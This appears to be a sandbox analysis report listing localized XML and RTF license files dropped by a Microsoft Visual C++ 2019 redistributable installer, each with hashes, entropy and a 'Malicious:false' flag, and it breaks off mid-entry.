                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3379
                                                                        Entropy (8bit):5.094097800535488
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOZuesXJhDEVTORNxSMoZN3mteNSiNGNsZuiAXEqicMwhPXbhu9KwKlK8Kq:uDiTl3N7xSbu0N8+AhSNnm
                                                                        MD5:561F3F32DB2453647D1992D4D932E872
                                                                        SHA1:109548642FB7C5CC0159BEDDBCF7752B12B264C0
                                                                        SHA-256:8E0DCA6E085744BFCBFF46F7DCBCFA6FBD722DFA52013EE8CEEAF682D7509581
                                                                        SHA-512:CEF8C80BEF8F88208E0751305DF519C3D2F1C84351A71098DC73392EC06CB61A4ACA35182A0822CF6934E8EE42196E2BCFE810CC859965A9F6F393858A1242DF
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] - Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">M.chten Sie den Vorgang wirklich abbrechen?</String>.. <String Id="HelpHeader">Setup-Hilfe</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [Verzeichnis] - installiert, repariert, deinstalliert oder.. erstellt eine vollst.ndige lokale Kopie des Bundles im Verzeichnis. Installieren ist die Standardeinstellung...../passive | /quiet - zeigt eine minimale Benutzeroberfl.che ohne Eingabeaufforderungen oder keine.. Benutzeroberfl.che und keine Eingabeaufforderungen an. Standardm..ig werden die Benutzeroberfl.che und alle Eingab
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):11593
                                                                        Entropy (8bit):5.106817099949188
                                                                        Encrypted:false
                                                                        SSDEEP:192:aRAbNYjVk+z5GUSLse5GgALEXmAWL+/3FEShP9sJgi8+Ra8woh+89EQdhwQPely6:K4yrPqm9LcVEg9sVp2ohHVdKoXJXci9a
                                                                        MD5:F0FF747B85B1088A317399B0E11D2101
                                                                        SHA1:F13902A39CEAE703A4713AC883D55CFEE5F1876C
                                                                        SHA-256:4D9B7F06BE847E9E135AB3373F381ED7A841E51631E3C2D16E5C40B535DA3BCF
                                                                        SHA-512:AA850F05571FFC361A764A14CA9C1A465E2646A8307DEEE0589852E6ACC61AF145AEF26B502835724D7245900F9F0D441451DD8C055404788CE64415F5B79506
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMES DU CONTRAT DE LICENCE LOGICIEL MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Les pr\'e9sents termes du contrat de licence constituent un contrat entre Microsoft Corporation (ou, en fonction de votre lieu de r\'e9sidence, l\rquote un de ses affili\'e9s) et vous. Ils s\rquote appliquent au logiciel vis\'e9 ci-dessus. Les termes s\rquote appliquent \'e9galement \'e0 tout service et \'e0 toute mise \'e0 jour Microsoft pour ce logiciel, \'e0 moins que d\rquote autres termes n\rquote accompagnent ces \'e9l\'e9ments.\par..\b SI VOUS VOUS CONFORMEZ AUX PR\'c9SENTS TERMES DU CONTRAT DE LICENCE, VOUS AVEZ LES DROITS CI-DESSOUS.\par....\pard{\pntext\f1\'B7\tab}{\*\pn\pnlvlblt\pnf1\pnindent360{\pntxtb\'B7}}\fi-357\li357\sb120\s
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3366
                                                                        Entropy (8bit):5.0912204406356905
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO1BesgKLhD1K8cocDSN3m4NlN2ZfNmXL8ePZFcZkLPqUf9fQKRLKeKqZfj:uDiTlABzH1/qt4qgcXY
                                                                        MD5:7B46AE8698459830A0F9116BC27DE7DF
                                                                        SHA1:D9BB14D483B88996A591392AE03E245CAE19C6C3
                                                                        SHA-256:704DDF2E60C1F292BE95C7C79EE48FE8BA8534CEB7CCF9A9EA68B1AD788AE9D4
                                                                        SHA-512:FC536DFADBCD81B42F611AC996059A6264E36ECF72A4AEE7D1E37B87AEFED290CC5251C09B68ED0C8719F655B163AD0782ACD8CE6332ED4AB4046C12D8E6DBF6
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installation de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Voulez-vous vraiment annuler.?</String>.. <String Id="HelpHeader">Aide du programme d'installation</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installe, r.pare, d.sinstalle ou.. cr.e une copie locale compl.te du groupe dans le r.pertoire. Install est l'option par d.faut...../passive | /quiet - affiche une interface minimale, sans invite, ou n'affiche ni interface.. ni invite. Par d.faut, l'interface et toutes les invites sont affich.es...../norestart - supprime toutes les tentatives de red.
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):11281
                                                                        Entropy (8bit):5.046489958240229
                                                                        Encrypted:false
                                                                        SSDEEP:192:WBGNX6UXR2+5SmgS/ChMErYkQvowHVw6zdgkycEGCDLQ+n3YJ2d8XSiej+T4Ma8f:gAzSVARBR5jEPLQY3YJpSjTP2
                                                                        MD5:9D98044BAC59684489C4CF66C3B34C85
                                                                        SHA1:36AAE7F10A19D336C725CAFC8583B26D1F5E2325
                                                                        SHA-256:A3F745C01DEA84CE746BA630814E68C7C592B965B048DDC4B1BBE1D6E533BE22
                                                                        SHA-512:D849BBB6C87C182CC98C4E2314C0829BB48BAD483D0CD97BF409E75457C3695049C3A8ADFE865E1ECBC989A910096D2C1CDF333705AAC4D22025DF91B355278E
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 CONTRATTO DI LICENZA PER IL SOFTWARE MICROSOFT\par..MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Le presenti condizioni di licenza costituiscono il contratto tra Microsoft Corporation (o, in base al luogo di residenza del licenziatario, una delle sue consociate) e il licenziatario, Tali condizioni si applicano al software Microsoft di cui sopra. Le condizioni si applicano inoltre a qualsiasi servizio o aggiornamento di Microsoft relativo al software, a meno che questo non sia accompagnato da condizioni differenti.\par..\b QUALORA IL LICENZIATARIO SI ATTENGA ALLE PRESENTI CONDIZIONI DI LICENZA, DISPORR\'c0 DEI DIRITTI INDICATI DI SEGUITO.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\p
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3319
                                                                        Entropy (8bit):5.019774955491369
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO1eesy+hD9BOtBFv5Vo8BbQhMNDJN3msNlNohNNz+wcPclM+PAoYKp+K/u:uDiTlfQvo8WutJ/s9FHNOJp
                                                                        MD5:D90BC60FA15299925986A52861B8E5D5
                                                                        SHA1:FADFCA9AB91B1AB4BD7F76132F712357BD6DB760
                                                                        SHA-256:0C57F40CC2091554307AA8A7C35DD38E4596E9513E9EFAE00AC30498EF4E9BC2
                                                                        SHA-512:11764D0E9F286B5AA7B1A9601170833E462A93A1E569A032FCBA9879174305582BD42794D4131B83FBCFBF1CF868A8D5382B11A4BD21F0F7D9B2E87E3C708C3F
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installazione di [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Annullare?</String>.. <String Id="HelpHeader">Guida alla configurazione</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installa, ripara, disinstalla o.. crea una copia locale completa del bundle nella directory. L'opzione predefinita . Install...../passive | /quiet - visualizza un'interfaccia utente minima senza prompt oppure non visualizza alcuna interfaccia utente.. n. prompt. Per impostazione predefinita viene visualizzata l'intera interfaccia utente e tutti i prompt...../norestart - annulla quals
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):28232
                                                                        Entropy (8bit):3.7669201853275722
                                                                        Encrypted:false
                                                                        SSDEEP:192:Qkb65jNkzrUJVbpEiTskXHH1AZWoJxfnVnkDYUqfQFXBue6hX2JSfR7q05kWZxhY:epCD3y/ybox2yrk2
                                                                        MD5:8C49936EC4CF0F64CA2398191C462698
                                                                        SHA1:CC069FE8F8BC3B6EE2085A4EACF40DB26C842BAC
                                                                        SHA-256:7355367B7C48F1BBACC66DFFE1D4BF016C16156D020D4156F288C2B2207ED1C2
                                                                        SHA-512:4381147FF6707C3D31C5AE591F68BC61897811112CB507831EFF5E71DD281009400EDA3300E7D3EFDE3545B89BCB71F2036F776C6FDFC73B6B2B2B8FBC084499
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3959
                                                                        Entropy (8bit):5.955167044943003
                                                                        Encrypted:false
                                                                        SSDEEP:96:uDiTlDuB1n+RNmvFo6bnpojeTPk0R/vueX5OA17IHdGWz:5uB1+gD1DU4EdGE
                                                                        MD5:DC81ED54FD28FC6DB6F139C8DA1BDED6
                                                                        SHA1:9C719C32844F78AAE523ADB8EE42A54D019C2B05
                                                                        SHA-256:6B9BBF90D75CFA7D943F036C01602945FE2FA786C6173E22ACB7AFE18375C7EA
                                                                        SHA-512:FD759C42C7740EE9B42EA910D66B0FA3F813600FD29D074BB592E5E12F5EC09DB6B529680E54F7943821CEFE84CE155A151B89A355D99C25A920BF8F254AA008
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.. <Control Control="UninstallButton" X="270" Y="237" Width="120" Height="23"/>.. <Control Control="RepairButton" X="187" Y="237" Width="80" Height="23"/>.. .. <String Id="Caption">[WixBundleName] .......</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">..........</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ............ ......... .........................
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):27936
                                                                        Entropy (8bit):3.871317037004171
                                                                        Encrypted:false
                                                                        SSDEEP:384:kKIgbA2uBsarNG/HxPvCL1ewjxsXmEw4C7C7R4jAeqCBO968y7yNRylBSFfQv9yH:d3ar8Xa/XAeqoc0wfBB4qN
                                                                        MD5:184D94082717E684EAF081CEC3CBA4B1
                                                                        SHA1:960B9DA48F4CDDF29E78BBAE995B52204B26D51B
                                                                        SHA-256:A4C25DA9E3FBCED47464152C10538F16EE06D8E06BC62E1CF4808D293AA1AFA2
                                                                        SHA-512:E4016C0CA348299B5EF761F456E3B5AD9B99E5E100C07ACAB1369DFEC214E75AA88E9AD2A0952C0CC1B707E2732779E6E3810B3DA6C839F0181DC81E3560CBDA
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3249
                                                                        Entropy (8bit):5.985100495461761
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO4TesKOwhDNJCkt1NhEN3m/NFNkbKNdExpVgUnqx6IPaRc0KoUK9TKz0KR:uDiTlUJJCsgqf6YVoz4uU5vI54U5TY
                                                                        MD5:B3399648C2F30930487F20B50378CEC1
                                                                        SHA1:CA7BDAB3BFEF89F6FA3C4AAF39A165D14069FC3D
                                                                        SHA-256:AD7608B87A7135F408ABF54A897A0F0920080F76013314B00D301D6264AE90B2
                                                                        SHA-512:C5B0ECF11F6DADF2E68BC3AA29CC8B24C0158DAE61FE488042D1105341773166C9EBABE43B2AF691AD4D4B458BF4A4BF9689C5722C536439CA3CDC84C0825965
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] .. ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">.. ...</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ..... ... .. .. .... .., .., .. .... ...... ... .........../passive | /quiet - .... .. .. UI. ..... UI ... ..... .... ..... ..... UI. .. ..... ........../norestart - .. .... .. .... ...
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13265
                                                                        Entropy (8bit):5.358483628484379
                                                                        Encrypted:false
                                                                        SSDEEP:192:TKpWRd0NE41Y/od7V/sHFos7YLQY9DbLM5D+Vw1VAOb0P4/sHLS7VHwHMPw95a+Q:uy0CG9KZ7qQCw1VAOZ/sHOJfcY2wf6p2
                                                                        MD5:5B9DF97FC98938BF2936437430E31ECA
                                                                        SHA1:AB1DA8FECDF85CF487709774033F5B4B79DFF8DE
                                                                        SHA-256:8CB5EB330AA07ACCD6D1C8961F715F66A4F3D69FB291765F8D9F1850105AF617
                                                                        SHA-512:4EF61A484DF85C487BE326AB4F95870813B9D0644DF788CE22D3BEB6E062CDF80732CB0B77FCDA5D4C951A0D67AECF8F5DCD94EA6FA028CFCA11D85AA97714E3
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.17763}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 POSTANOWIENIA LICENCYJNE DOTYCZ\f1\'a5CE OPROGRAMOWANIA\par..\f0 MICROSOFT VISUAL C++ 2019 RUNTIME \par..\b0 Niniejsze postanowienia licencyjne stanowi\f1\'b9 umow\'ea mi\'eadzy Microsoft Corporation (lub, w\~zale\'bfno\'9cci od miejsca zamieszkania Licencjobiorcy, jednym z\~podmiot\f0\'f3w stowarzyszonych Microsoft Corporation) a\~Licencjobiorc\f1\'b9. Maj\'b9 one zastosowanie do wskazanego powy\'bfej oprogramowania. Niniejsze postanowienia maj\'b9 r\f0\'f3wnie\f1\'bf zastosowanie do wszelkich us\'b3ug i aktualizacji Microsoft dla niniejszego oprogramowania, z wyj\'b9tkiem tych, kt\f0\'f3rym towarzysz\f1\'b9 inne postanowienia.\par..\b\
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3212
                                                                        Entropy (8bit):5.268378763359481
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOPesar4hDo7zGriQjDCN3mDNN0NrsNGl3vxkIP2hUdKLK0KbK4n6W0sfNM:uDiTlusPGriQw8n2rOij4JsU
                                                                        MD5:15172EAF5C2C2E2B008DE04A250A62A1
                                                                        SHA1:ED60F870C473EE87DF39D1584880D964796E6888
                                                                        SHA-256:440B309FCDF61FFC03B269FE3815C60CB52C6AE3FC6ACAD14EAC04D057B6D6EA
                                                                        SHA-512:48AA89CF4A0B64FF4DCB82E372A01DFF423C12111D35A4D27B6D8DD793FFDE130E0037AB5E4477818A0939F61F7DB25295E4271B8B03F209D8F498169B1F9BAE
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):10656
                                                                        Entropy (8bit):5.092962528947159
                                                                        Encrypted:false
                                                                        SSDEEP:192:WIPAufWXXF0+YkR6E0/CiTS0CsGlHIMqf29H7KxLY/aYzApT3anawLXCBX2:VPAufb+YSSCYrCb5BmW4UDaTqzLwX2
                                                                        MD5:360FC4A7FFCDB915A7CF440221AFAD36
                                                                        SHA1:009F36BBDAD5B9972E8069E53855FC656EA05800
                                                                        SHA-256:9BF79B54F4D62BE501FF53EEDEB18683052A4AE38FF411750A764B3A59077F52
                                                                        SHA-512:9550A99641F194BB504A76DE011D07C1183EE1D83371EE49782FC3D05BF779415630450174DD0C03CB182A5575F6515012337B899E2D084203717D9F110A6FFE
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3095
                                                                        Entropy (8bit):5.150868216959352
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO5es/4ThDzmU6lDj4N3mBl0N+NWNP4hHCc9skPDXeKKeK9KfKt4eJ2RQdg:uDiTlJhJGl2UsZMLe6
                                                                        MD5:BE27B98E086D2B8068B16DBF43E18D50
                                                                        SHA1:6FAF34A36C8D9DE55650D0466563852552927603
                                                                        SHA-256:F52B54A0E0D0E8F12CBA9823D88E9FD6822B669074DD1DC69DAD6553F7CB8913
                                                                        SHA-512:3B7C773EF72D40A8B123FDB8FC11C4F354A3B152CF6D247F02E494B0770C28483392C76F3C222E3719CF500FE98F535014192ACDDD2ED9EF971718EA3EC0A73E
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):31915
                                                                        Entropy (8bit):3.6440775919653996
                                                                        Encrypted:false
                                                                        SSDEEP:384:ntaMxngQEqQUaAEJxkSjjujcme51oVwuZOFsrnkGxunWxGc9wtvVYgCzkSxN1S2:npgnmWWNEvVYgCzxD
                                                                        MD5:A59C893E2C2B4063AE821E42519F9812
                                                                        SHA1:C00D0B11F6B25246357053F6620E57D990EFC698
                                                                        SHA-256:0EC8368E87B3DFC92141885A2930BDD99371526E09FC52B84B764C91C5FC47B8
                                                                        SHA-512:B9AD8223DDA2208EC2068DBB85742A03BE0291942E60D4498E3DAB4DDF559AA6DCF9879952F5819223CFC5F4CB71D4E06E4103E129727AACFB8EFE48403A04FA
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4150
                                                                        Entropy (8bit):5.444436038992627
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlDhQt9esbrohDTWJt49kAr7DHN3m5GNDCNvNLIkflhrWncPingGdZwK1Kqp:uDiTlDYVgmt4xJ88k193ipzjvL
                                                                        MD5:17C652452E5EE930A7F1E5E312C17324
                                                                        SHA1:59F3308B87143D8EA0EA319A1F1A1F5DA5759DD3
                                                                        SHA-256:7333BC8E52548821D82B53DBD7D7C4AA1703C85155480CB83CEFD78380C95661
                                                                        SHA-512:53FD207B96D6BCF0A442E2D90B92E26CBB3ECC6ED71B753A416730E8067E831E9EB32981A9E9368C4CCA16AFBCB2051483FDCFC474EA8F0D652FCA934634FBE8
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13379
                                                                        Entropy (8bit):5.214715951393874
                                                                        Encrypted:false
                                                                        SSDEEP:192:1fGkc01jIjZTUDUTvXt2QpfC5VAlCPpDwuOfH7df3YwnnbZIWG2XjQeoO9uBO8CA:Iiqx4Uh2QpMVA8haDdv9nbZzG6oQR2
                                                                        MD5:BD2DC15DFEE66076BBA6D15A527089E7
                                                                        SHA1:8768518F2318F1B8A3F8908A056213042A377CC4
                                                                        SHA-256:62A07232017702A32F4B6E43E9C6F063B67098A1483EEDDB31D7C73EAF80A6AF
                                                                        SHA-512:9C9467A2F2D0886FF4302A44AEA89734FCEFBD3CBE04D895BCEACBA1586AB746E62391800E07B6228E054014BE51F14FF63BA71237268F94019063C8C8B7EF74
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3221
                                                                        Entropy (8bit):5.280530692056262
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOaesHEqhDTHV4zVy6oBzdp0DYK2GP2ZmN3majyNXNoNKQXVvChcPc+WKb0:uDiTl3PHcIflKNTPgdi12xgg
                                                                        MD5:DEFBEA001DC4EB66553630AC7CE47CCA
                                                                        SHA1:90CED64EC7C861F03484B5D5616FDBCDA8F64788
                                                                        SHA-256:E5ABE3CB3BF84207DAC4E6F5BBA1E693341D01AEA076DD2D91EAA21C6A6CB925
                                                                        SHA-512:B3B7A22D0CDADA21A977F1DCEAF2D73212A4CDDBD298532B1AC97575F36113D45E8D71C60A6D8F8CC2E9DBF18EE1000167CFBF0B2E7ED6F05462D77E0BCA0E90
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):17863
                                                                        Entropy (8bit):3.9617786349452775
                                                                        Encrypted:false
                                                                        SSDEEP:192:BxoqPyOj+/8Tk5VigWgijAlk5xWvSCI5lgios0EhGXxGMLVGW+uUoqyLZDvAJxMx:vbIeaE7q3KGgzD2
                                                                        MD5:3CF16377C0D1B2E16FFD6E32BF139AC5
                                                                        SHA1:D1A8C3730231D51C7BB85A7A15B948794E99BDCE
                                                                        SHA-256:E95CA64C326A0EF7EF3CED6CDAB072509096356C15D1761646E3C7FDA744D0E0
                                                                        SHA-512:E9862FD0E8EC2B2C2180183D06535A16A527756F6907E6A1D2DB85092636F72C497508E793EE8F2CC8E0D1A5E090C6CCF465F78BC1FA8E68DAF7C68815A0EE16
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2978
                                                                        Entropy (8bit):6.135205733555905
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOtKesi+hDtkQf7lz+W0gopN3m5+3cNONeN1ra8vWqPtlTKxKUTKlKXRoR+:uDiTlV5kQR9GLeE0ZxV6gIV
                                                                        MD5:3D1E15DEEACE801322E222969A574F17
                                                                        SHA1:58074C83775E1A884FED6679ACF9AC78ABB8A169
                                                                        SHA-256:2AC8B7C19A5189662DE36A0581C90DBAD96DF259EC00A28F609B644C3F39F9CA
                                                                        SHA-512:10797919845C57C5831234E866D730EBD13255E5BF8BA8087D53F1D0FC5D72DC6D5F6945DBEBEE69ACC6A2E20378750C4B78083AE0390632743C184532358E10
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):10714
                                                                        Entropy (8bit):5.122578090102117
                                                                        Encrypted:false
                                                                        SSDEEP:192:WthGE/9wd8eQF/hJOmQeNrXT77uOlQ+v3AqHqc3wpXGYdjvsk2cwBb2:mhGuhj+ed388Bb2
                                                                        MD5:FBF293EE95AFEF818EAF07BB088A1596
                                                                        SHA1:BBA1991BA6459C9F19B235C43A9B781A24324606
                                                                        SHA-256:1FEC058E374C20CB213F53EB3C44392DDFB2CAA1E04B7120FFD3FA7A296C83E2
                                                                        SHA-512:6971F20964EF74B19077EE81F953342DC6D2895A8640EC84855CECCEA5AEB581E6A628BCD3BA97A5D3ACB6CBE7971FDF84EF670BDDF901857C3CD28855212019
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3265
                                                                        Entropy (8bit):5.0491645049584655
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO/esS6VGhDv4tiUiyRUqzC4U+aD6N3m7xNh1NWNGbPz+9o3PWeKK9K9KfT:uDiTlxouUTiySqyIwz9sgxqvjIk8
                                                                        MD5:47F9F8D342C9C22D0C9636BC7362FA8F
                                                                        SHA1:3922D1589E284CE76AB39800E2B064F71123C1C5
                                                                        SHA-256:9CBB2B312C100B309A1B1495E84E2228B937612885F7A642FBBD67969B632C3A
                                                                        SHA-512:E458DF875E9B0622AEBE3C1449868AA6A2826A1F851DB71165A872B2897CF870CCF85046944FF51FFC13BB15E54E9D9424EC36CAF5A2F38CE8B7D6DC0E9B2363
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (591), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):13188
                                                                        Entropy (8bit):3.7277002414324074
                                                                        Encrypted:false
                                                                        SSDEEP:192:X0s1PoDnH5zHqQHG0Hd8Hz7HE06HA0rH3pKp5cxLU71zLG0Lw4cBx7z8NkzzkvQY:X0sN0dLbmnoNEQkxJM4ZVEpPEv
                                                                        MD5:58518543644BAA7BFC6B67B251AF84FF
                                                                        SHA1:97D4538050BB6D1BDE14A918385038E651389E33
                                                                        SHA-256:650B3CC3CDB3630ED9FCF8E5E493E28586B5F7768F5ADC317D884B8184CBE15E
